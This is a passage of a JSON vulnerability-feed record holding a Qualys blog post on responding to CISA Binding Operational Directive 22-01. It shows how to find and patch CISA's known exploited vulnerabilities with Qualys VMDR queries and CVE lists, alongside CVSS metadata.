"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-40449", "CVE-2021-42292", "CVE-2021-42321"], "modified": "2022-01-25T00:00:00", "id": "CISA:D12090E3D1C36426271DE8458FFF31E4", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/cisa-adds-four-known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. 
This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. 
Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-10
20`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149
`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}